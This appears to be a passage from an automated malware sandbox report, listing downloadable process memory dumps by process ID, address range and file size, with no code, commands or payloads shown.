memory/3944-110-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3944-111-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/3944-106-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/4028-38-0x00000000072E0000-0x00000000072FA000-memory.dmp

Filesize
104KB

Download
memory/4028-1-0x00000000029B0000-0x00000000029E6000-memory.dmp

Filesize
216KB

Download
memory/4028-37-0x0000000007960000-0x0000000007FDA000-memory.dmp

Filesize
6.5MB

Download
memory/4028-39-0x0000000007340000-0x000000000734A000-memory.dmp

Filesize
40KB

Download
memory/4028-40-0x0000000007580000-0x0000000007616000-memory.dmp

Filesize
600KB

Download
memory/4028-41-0x00000000074E0000-0x00000000074F1000-memory.dmp

Filesize
68KB

Download
memory/4028-42-0x0000000007510000-0x000000000751E000-memory.dmp

Filesize
56KB

Download
memory/4028-43-0x0000000007520000-0x0000000007534000-memory.dmp

Filesize
80KB

Download
memory/4028-44-0x0000000007560000-0x000000000757A000-memory.dmp

Filesize
104KB

Download
memory/4028-45-0x0000000007550000-0x0000000007558000-memory.dmp

Filesize
32KB

Download
memory/4028-35-0x0000000007230000-0x00000000072D3000-memory.dmp

Filesize
652KB

Download
memory/4028-36-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-34-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-33-0x0000000006580000-0x000000000659E000-memory.dmp

Filesize
120KB

Download
memory/4028-58-0x0000000007550000-0x0000000007558000-memory.dmp

Filesize
32KB

Download
memory/4028-23-0x000000006E4B0000-0x000000006E804000-memory.dmp

Filesize
3.3MB

Download
memory/4028-64-0x00000000718AE000-0x00000000718AF000-memory.dmp

Filesize
4KB

Download
memory/4028-65-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-66-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-67-0x0000000007800000-0x0000000007822000-memory.dmp

Filesize
136KB

Download
memory/4028-68-0x0000000008590000-0x0000000008B34000-memory.dmp

Filesize
5.6MB

Download
memory/4028-21-0x000000006E160000-0x000000006E1AC000-memory.dmp

Filesize
304KB

Download
memory/4028-74-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-22-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-20-0x0000000006F50000-0x0000000006F82000-memory.dmp

Filesize
200KB

Download
memory/4028-0-0x00000000718AE000-0x00000000718AF000-memory.dmp

Filesize
4KB

Download
memory/4028-2-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-3-0x0000000005160000-0x0000000005788000-memory.dmp

Filesize
6.2MB

Download
memory/4028-4-0x00000000718A0000-0x0000000072050000-memory.dmp

Filesize
7.7MB

Download
memory/4028-5-0x0000000004FC0000-0x0000000004FE2000-memory.dmp

Filesize
136KB

Download
memory/4028-6-0x0000000005060000-0x00000000050C6000-memory.dmp

Filesize
408KB

Download
memory/4028-7-0x00000000050D0000-0x0000000005136000-memory.dmp

Filesize
408KB

Download
memory/4028-17-0x0000000005950000-0x0000000005CA4000-memory.dmp

Filesize
3.3MB

Download
memory/4028-18-0x0000000005F90000-0x0000000005FAE000-memory.dmp

Filesize
120KB

Download
memory/4028-19-0x00000000064F0000-0x000000000653C000-memory.dmp

Filesize
304KB

Download
memory/4348-88-0x00000000054E0000-0x00000000054E6000-memory.dmp

Filesize
24KB

Download
memory/4348-86-0x00000000054C0000-0x00000000054D2000-memory.dmp

Filesize
72KB

Download
memory/4348-87-0x0000000007CF0000-0x0000000007D8C000-memory.dmp

Filesize
624KB

Download
memory/4564-114-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4564-117-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4564-93-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-91-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-90-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-89-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-95-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-97-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-99-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-96-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-118-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/4564-94-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-119-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-121-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-120-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-122-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-123-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-124-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-125-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-126-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-127-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-128-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4564-129-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download